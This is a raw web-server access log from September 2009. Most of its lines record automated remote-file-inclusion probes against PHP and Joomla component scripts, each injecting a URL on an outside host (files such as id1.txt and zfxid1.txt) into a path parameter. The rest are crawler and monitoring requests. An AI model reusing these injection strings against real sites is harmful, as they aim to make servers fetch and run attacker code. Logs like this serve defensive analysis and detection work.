123.242.165.138 - - [04/Sep/2009:00:24:27 -0400] "GET /logs/access_log.Q109081100/index1.php?author=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
123.242.165.138 - - [04/Sep/2009:00:24:27 -0400] "GET /index1.php?author=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
222.122.72.216 - - [04/Sep/2009:00:24:38 -0400] "GET /logs/access_log.Q109051100//stats/modules/My_eGallery/index.php?basepath=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 404 261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
222.122.72.216 - - [04/Sep/2009:00:24:38 -0400] "GET /logs/access_log.Q109061700//stats/modules/My_eGallery/index.php?basepath=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 404 261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
123.242.165.138 - - [04/Sep/2009:00:24:43 -0400] "GET /logs/index1.php?author=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
123.242.165.138 - - [04/Sep/2009:00:24:43 -0400] "GET /logs/index1.php?author=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
123.242.165.138 - - [04/Sep/2009:00:25:38 -0400] "GET /logs/error_log.Q109081100/index1.php?author=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
123.242.165.138 - - [04/Sep/2009:00:25:38 -0400] "GET /logs/error_log.Q109081100/index1.php?author=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.146.223 - - [04/Sep/2009:00:26:08 -0400] "GET //?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:00:26:08 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 200 16431 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:00:26:22 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:26:26 -0400] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:26:26 -0400] "GET /logs/access_log.Q109051000%20%20/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:26:26 -0400] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.75.220.49 - - [04/Sep/2009:00:27:13 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:00:27:19 -0400] "GET /logs/access_log.Q109072300//modules/My_eGallery/errors.php?error=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
211.218.40.180 - - [04/Sep/2009:00:27:20 -0400] "GET //modules/My_eGallery/errors.php?error=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
211.218.40.180 - - [04/Sep/2009:00:27:20 -0400] "GET /logs//modules/My_eGallery/errors.php?error=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.75.220.49 - - [04/Sep/2009:00:27:31 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:00:27:32 -0400] "GET //modules/My_eGallery/errors.php?error=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
110.45.146.223 - - [04/Sep/2009:00:27:32 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:00:27:32 -0400] "GET //?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:00:27:32 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 200 16431 "-" "Mozilla/5.0"
211.75.220.49 - - [04/Sep/2009:00:27:36 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:27:44 -0400] "GET /logs/access_log.Q109051200%20%20/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:00:27:37 -0400] "GET /logs/access_log.Q109061500 HTTP/1.0" 200 5178745 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.214.57.41 - - [04/Sep/2009:00:28:10 -0400] "GET //common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:28:10 -0400] "GET /logs//common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:28:10 -0400] "GET /logs/error_log.Q109070500%20%20//common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:28:13 -0400] "GET //common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:28:13 -0400] "GET /logs/error_log.Q109070500%20%20//common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:28:13 -0400] "GET /logs//common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:28:20 -0400] "GET //common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:28:20 -0400] "GET /logs//common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:28:20 -0400] "GET /logs/error_log.Q109070500%20%20//common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
193.192.122.30 - - [04/Sep/2009:00:28:55 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:00:29:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.115.89.97 - - [04/Sep/2009:00:29:34 -0400] "GET /logs/access_log.Q109052300%20%20/?htmlclass_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:00:29:34 -0400] "GET /?htmlclass_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:00:29:34 -0400] "GET /logs/?htmlclass_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 200 16426 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:00:29:45 -0400] "GET /logs/error_log.Q109052300%20%20/?htmlclass_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.42.1.29 - - [04/Sep/2009:00:29:59 -0400] "GET /setup.php?dir=http://www.turboteh.ru//assets/snippets/reflect/yuo.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
61.42.1.29 - - [04/Sep/2009:00:29:59 -0400] "GET /logs/setup.php?dir=http://www.turboteh.ru//assets/snippets/reflect/yuo.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
61.42.1.29 - - [04/Sep/2009:00:30:27 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.turboteh.ru//assets/snippets/reflect/yuo.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
61.42.1.29 - - [04/Sep/2009:00:30:27 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.turboteh.ru//assets/snippets/reflect/yuo.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
64.76.136.36 - - [04/Sep/2009:00:30:29 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.76.136.36 - - [04/Sep/2009:00:30:29 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.76.136.36 - - [04/Sep/2009:00:30:29 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
74.50.85.104 - - [04/Sep/2009:00:31:23 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.50.85.104 - - [04/Sep/2009:00:31:23 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.50.85.104 - - [04/Sep/2009:00:31:23 -0400] "GET /logs/access_log.Q109080900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:00:31:35 -0400] "GET //?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:00:31:35 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 200 16431 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:00:31:41 -0400] "GET /logs/error_log.Q109081900 HTTP/1.0" 200 3079655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
110.45.146.223 - - [04/Sep/2009:00:31:47 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:00:31:41 -0400] "GET /logs/error_log.Q109081900 HTTP/1.0" 200 3079655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.218.40.180 - - [04/Sep/2009:00:32:24 -0400] "GET /logs/access_log.Q109052200//modules/My_eGallery/errors.php?error=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
67.218.116.132 - - [04/Sep/2009:00:32:36 -0400] "GET /logs/access_log.Q109081000 HTTP/1.0" 200 5307504 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [04/Sep/2009:00:34:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.3.129.73 - - [04/Sep/2009:00:34:08 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.0" 404 234 "-" "Mozilla/5.0"
203.126.23.51 - - [04/Sep/2009:00:37:36 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.126.23.51 - - [04/Sep/2009:00:37:36 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.126.23.51 - - [04/Sep/2009:00:37:36 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.76.136.36 - - [04/Sep/2009:00:37:41 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
64.76.136.36 - - [04/Sep/2009:00:37:41 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:00:38:52 -0400] "GET /logs/error_log.Q109083000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [04/Sep/2009:00:39:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.75.220.49 - - [04/Sep/2009:00:39:58 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:40:06 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:40:06 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:40:11 -0400] "GET /logs/access_log.Q109080600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
64.76.136.36 - - [04/Sep/2009:00:40:32 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:00:40:37 -0400] "GET /logs/access_log.Q109071900//board/view.php?bbs_id=http://aflamsat.com/kernel/linux/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
110.45.146.223 - - [04/Sep/2009:00:40:37 -0400] "GET //board/view.php?bbs_id=http://aflamsat.com/kernel/linux/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
110.45.146.223 - - [04/Sep/2009:00:40:37 -0400] "GET /logs//board/view.php?bbs_id=http://aflamsat.com/kernel/linux/id.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
110.45.146.223 - - [04/Sep/2009:00:40:37 -0400] "GET /logs/access_log.Q109062000//board/view.php?bbs_id=http://aflamsat.com/kernel/linux/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
203.126.23.51 - - [04/Sep/2009:00:43:18 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:00:44:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.87.64.234 - - [04/Sep/2009:00:44:35 -0400] "GET //bp_ncom.php?bnrep=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
70.87.64.234 - - [04/Sep/2009:00:44:35 -0400] "GET /logs/access_log.Q109080900%20%20//bp_ncom.php?bnrep=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
70.87.64.234 - - [04/Sep/2009:00:44:35 -0400] "GET /logs//bp_ncom.php?bnrep=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
70.87.64.234 - - [04/Sep/2009:00:45:14 -0400] "GET /logs/access_log.Q109080900//bp_ncom.php?bnrep=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:46:28 -0400] "GET /logs/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:46:28 -0400] "GET /administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:46:28 -0400] "GET /logs/access_log.Q109070500/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:46:34 -0400] "GET /logs/access_log.Q109080900/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:46:54 -0400] "GET /logs//common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:46:54 -0400] "GET /logs/error_log.Q109070500%20%20//common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:46:54 -0400] "GET //common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:46:56 -0400] "GET //common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:46:56 -0400] "GET /logs//common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.214.57.41 - - [04/Sep/2009:00:46:56 -0400] "GET /logs/error_log.Q109070500%20%20//common/db.php?commonpath=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.233.52.18 - - [04/Sep/2009:00:47:53 -0400] "GET /logs/access_log.Q109080900//bp_ncom.php?bnrep=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.233.52.18 - - [04/Sep/2009:00:47:53 -0400] "GET /logs//bp_ncom.php?bnrep=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
222.233.52.18 - - [04/Sep/2009:00:47:53 -0400] "GET //bp_ncom.php?bnrep=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:48:08 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:48:08 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:48:08 -0400] "GET /logs/access_log.Q109070500/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:48:13 -0400] "GET /logs/access_log.Q109080900/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:48:25 -0400] "GET /logs/access_log.Q109071500%20%20/administrator/components/com_uddeim/admin.uddeim.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:48:25 -0400] "GET /administrator/components/com_uddeim/admin.uddeim.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:48:25 -0400] "GET /logs/administrator/components/com_uddeim/admin.uddeim.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:48:45 -0400] "GET /logs/access_log.Q109070500%20%20/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:48:46 -0400] "GET /logs/access_log.Q109080900%20%20/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:00:49:00 -0400] "GET /logs/access_log.Q109071500/administrator/components/com_uddeim/admin.uddeim.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:00:49:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.50.85.104 - - [04/Sep/2009:00:49:55 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.50.85.104 - - [04/Sep/2009:00:49:55 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.50.85.104 - - [04/Sep/2009:00:49:55 -0400] "GET /logs/access_log.Q109080900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:00:49:57 -0400] "GET /logs/access_log.Q109081100%20%20//?_SERVER[DOCUMENT_ROOT]=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.233.52.18 - - [04/Sep/2009:00:49:57 -0400] "GET /logs/access_log.Q109080900%20%20//bp_ncom.php?bnrep=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:00:49:57 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:00:49:57 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 200 16431 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:06 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:07 -0400] "GET /logs/access_log.Q109080900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:07 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:29 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:29 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:29 -0400] "GET /logs/access_log.Q109080900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:34 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:34 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:34 -0400] "GET /logs/access_log.Q109080900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:38 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:38 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:00:50:38 -0400] "GET /logs/access_log.Q109080900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
